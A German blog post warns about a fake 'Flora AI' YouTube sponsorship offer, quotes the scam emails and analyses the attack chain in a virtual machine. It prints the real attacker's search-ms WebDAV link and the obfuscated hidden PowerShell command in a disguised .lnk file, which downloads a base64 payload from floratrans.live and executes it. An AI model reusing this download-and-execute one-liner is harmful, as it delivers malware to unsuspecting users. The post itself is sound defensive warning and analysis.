Achtung: Flora-AI.org - Fake Firma versucht Trojaner zu installieren
Inhalt
Vor kurzem erreichte uns eine Kooperationsanfrage von einem angeblichen KI-Projekt namens “Flora AI”. $1500 für einen 10-sekündigen Pre-Roll auf YouTube klangen verlockend – doch bei genauerem Hinsehen zeigte das Angebot einige verdächtige Details.
Flora AI schreibt
Die Anfrage beginnt, man will mit uns zusammen arbeiten. 1500 Dollar sind nicht schlecht.
Greetings,
I am a representative of Flora AI and hold the position of Communications Manager. Our company is actively expanding its presence in the digital space and is interested in building sustained and productive partnerships with reliable collaborators.
We are considering a one-time placement of a 10-second ad in the middle of your video on YouTube.
We offer $1500, but if this amount seems small to you, you can suggest your own amount, we’ll be happy to discuss it.
You can also explore more about our product on our website: flora-ai
Sincerely, PR Manager
Flora AI
Antwort
Daher schreiben wir zurück, um was es genau geht.
Hello,
Thank you for reaching out regarding a potential collaboration. I appreciate your interest in my YouTube channel and the opportunity to partner with Flora AI.
I am excited to explore the potential of working together, but I’d like to ensure that the partnership aligns with my audience and values. What do you expect, do yo have examples?
Looking forward to hearing from you.
Best regards,
Das Angebot im Detail
$1500 für 10 Sekunden? Klingt nach einem Traumjob, oder? Dazu noch Zugang zu einer magischen KI-Plattform namens „Flora AI“, die alles kann: Übersetzen, Fotos aufpolieren, 3D-Texturen erstellen – wahrscheinlich kann sie auch Kaffee kochen. E-Mail kam von “partners@flora-ai.org”.
Der Haken? Der Vertrag soll auf einer ominösen Website abgeschlossen werden, und bezahlt wird, wie wir wollen – sogar in Goldmünzen, wenn nötig. Klingt fast zu gut, um wahr zu sein. Spoiler: War es auch.
Greetings, thank you for your interest in cooperation.
We offer $1500 for a 10-second pre-roll on YouTube channel.Payment by any convenient way (bank transfer, cryptocurrency, PayPal, international transfers).
Payment is made before publishing the video immediately after signing the partnership agreement by convenient for you payment details.
The partnership agreement is signed directly on our website, for this purpose you will be provided with a partner account.We offer access with unlimited number of tokens for your generation on our project.
To begin with, I would like to familiarize you with the project - Flora AI
Website - flora-ai.org
Flora AI is a unique project based on Artificial Intelligence.
Its features are:
Image/video/audio/voice generation
Ability to train your models on Flora AI project servers
Finetune models
Generate textures for 3DFlora AI - has the ability to upscale photos with 100% accuracy.
But these are not the main advantages of Flora AI project.
The main highlight is real-time translation of video and audio.
Real-time translation is super accurate, because we emphasized on it, so that people would not have any interfering boundaries in understanding the content they are viewing.To this email I have attached a pre-roll that you will need to integrate into the middle of your next video or publish to shorts, check it out.
Flora AI - is under development, but is ready to receive visitors and is accepting them in a closed testing format. That’s why we are looking for an opportunity to share our project with a larger audience.
At the moment the Web version of our project is available, the application for Windows & MacOS and browser extensions are under intensive development.
If you are still interested - please let us know.
Wir wollen mehr wissen
Natürlich wollten wir genauer wissen, mit wem wir es zu tun haben – und was uns wirklich erwartet. Unsere höfliche Antwort ließ keine Zweifel offen: Wir waren interessiert, aber brauchten mehr Details. Wer ist Flora AI? Was genau steckt hinter der Plattform? Und wie sieht der sogenannte „Partnership Agreement“ aus? Schließlich wollten wir sicherstellen, dass unser Wellensittich (und wir) nicht in die Falle tappen. Bis dahin war alles offen – zumindest für uns.
Dear Flora,
thank you for reaching out to us with this exciting opportunity. We are interested in collaborating and agree to the proposed terms of $1500 for a 10-second pre-roll on our YouTube channel.
Please provide further details regarding the partnership agreement and next steps. We would also appreciate receiving more information about Flora AI and any specific requirements for the pre-roll integration.
Looking forward to your reply.
Best regards, Hugo
Die Webseite
Die Webseite sieht gar nicht mal so schlecht aus. Alles gut gemacht, keine toten Links und Inhalte die irgendwie sinnvoll erscheinen.
Flora AI schreibt zurück
Wir bekommen eine Antwort. Wir bekommen einen Code für die Freischaltung als Sponsor.
Dann loggen wir uns mal ein
Mit dem Code gelingt der Login. Auch hier wird professionell gearbeitet. Alles sieht schick und echt aus.
Ab hier wird es aber schnell kriminell. Wir sollen zuerst einen Vertrag herunterladen und unterzeichnen. Dies funktioniert nur unter Windows und nur mit dem Edge-Browser. Es kommt eine Meldung, dass wir den Link mit dem Windows-Explorer öffnen sollen.
Wir machen das in der virtuellen Maschine, aber bereits hier sollten alle Alarmglocken schrillen. Ein Download sollte niemals im Explorer geöffnet werden. Windows warnt uns sogar noch ein zweites Mal.
Hier brechen wir ab und schauen uns an, auf was der Browser zugreifen will. Wir finden eine verdächtige Verbindung im Browserprotokoll. Im Prinzip eine Art Shortcut, welcher ein externes WebDAV-Verzeichnis im Explorer öffnen würde.
Der komplette Link:
search-ms:query=&crumb=location:\\floratrans.live@SSL\webdav\Docs\Generated\Verification\Partner_19\Downloads\&displayname=Search
Wir öffnen die WebDAV-Adresse manuell über den Explorer, hier finden wir dann eine vermeintliche PDF-Datei. Der Pfeil signalisiert aber, hey, hier ist eine .lnk Datei.
Diese werfen wir mal in VirusTotal, was gleich zu einigen Warnungen führt.
Was tut die .lnk Datei?
Über Rechtsklick und Eigenschaften finden wir heraus, was die Datei macht.
Der komplette Befehl:
C:\Windows\System32\conhost.exe --headless pow"ersh"el"l.exe"
-WindowStyle Hidden -ExecutionPolicy Bypass -Command
"&{$b=(Invoke-WebRequest 'https://floratrans.live/495/didi.txt').Content;iex([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($b)))}
Schauen wir uns die Sache genauer an, sehen wir, dass hier mittels Powershell eine Datei aus dem Internet geladen werden soll. Diese wird anschließend dekodiert und ausgeführt.
Installation des Trojaners
Bei genauerer Betrachtung stellt sich die vermeintliche Kooperationsanfrage als ausgeklügelter Angriff heraus. Ein bereitgestelltes Skript baut dynamisch URLs zusammen, um Dateien wie pomoykaXL.exe und eine angebliche PDF herunterzuladen und auszuführen.
Es legt diese Dateien im Dokumente-Ordner ab und startet sie direkt, während der Windows-Explorer gezielt beendet wird, vermutlich um Nutzeraktionen zu erschweren.
Gleichzeitig nimmt das Skript Kontakt zu einem Server unter der Domain floratrans.live auf, um den Angreifern vermutlich den Erfolg zu melden. Nach fünf Minuten löscht es die schädlichen Dateien, um Spuren zu verwischen.
Dieses Vorgehen zeigt, wie wichtig es ist, verdächtige Dateien und Skripte zu prüfen und im Zweifel nicht auszuführen.
Analyse mit VirusTotal
Auch eine Überprüfung mit VirusTotal lässt wenige Zweifel:
Fazit: Aufgepasst!
Die Webseite von „Flora AI“ ist auf den ersten Blick hervorragend gestaltet und vermittelt einen professionellen Eindruck, der Vertrauen wecken soll. Doch genau darin liegt die Gefahr: Eine ansprechende Optik und überzeugende Inhalte können schnell darüber hinwegtäuschen, dass es sich um einen raffinierten Betrugsversuch handelt.
Der Angriff zeigt, wie ausgeklügelt solche Maschen mittlerweile sind – von dynamisch generierten Schadskripten bis hin zu scheinbar seriösen Angeboten. Unser Tipp: Niemals blind vertrauen, auch wenn die Webseite professionell wirkt. Ein kritischer Blick und Vorsicht bei unerwarteten Anfragen können viel Ärger ersparen.